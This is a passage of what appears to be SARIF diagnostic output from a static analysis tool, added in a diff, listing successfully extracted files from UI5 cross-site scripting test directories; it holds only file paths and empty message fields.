"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 333 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 334 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 335 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 336 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 337 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 338 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 339 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 340 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 341 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 342 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 343 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/model.json", + "uriBaseId" : "%SRCROOT%", + "index" : 344 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 345 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 346 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + 
"uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 347 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 348 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 349 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 350 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 351 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 352 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 353 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 354 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", + "uriBaseId" : "%SRCROOT%", + "index" : 355 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 356 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 357 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 358 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 359 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssBase.js", + "uriBaseId" : "%SRCROOT%", + "index" : 360 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 361 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 362 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 363 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 364 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 365 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 366 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 367 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 368 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 369 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 370 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 371 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 372 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 373 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 374 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", + "uriBaseId" : "%SRCROOT%", + "index" : 375 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 376 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 377 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 378 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 379 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 380 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 381 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", + "uriBaseId" : "%SRCROOT%", + "index" : 382 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 383 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 384 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 385 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 386 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 387 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 388 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 389 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 390 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 391 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 392 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 393 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 394 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
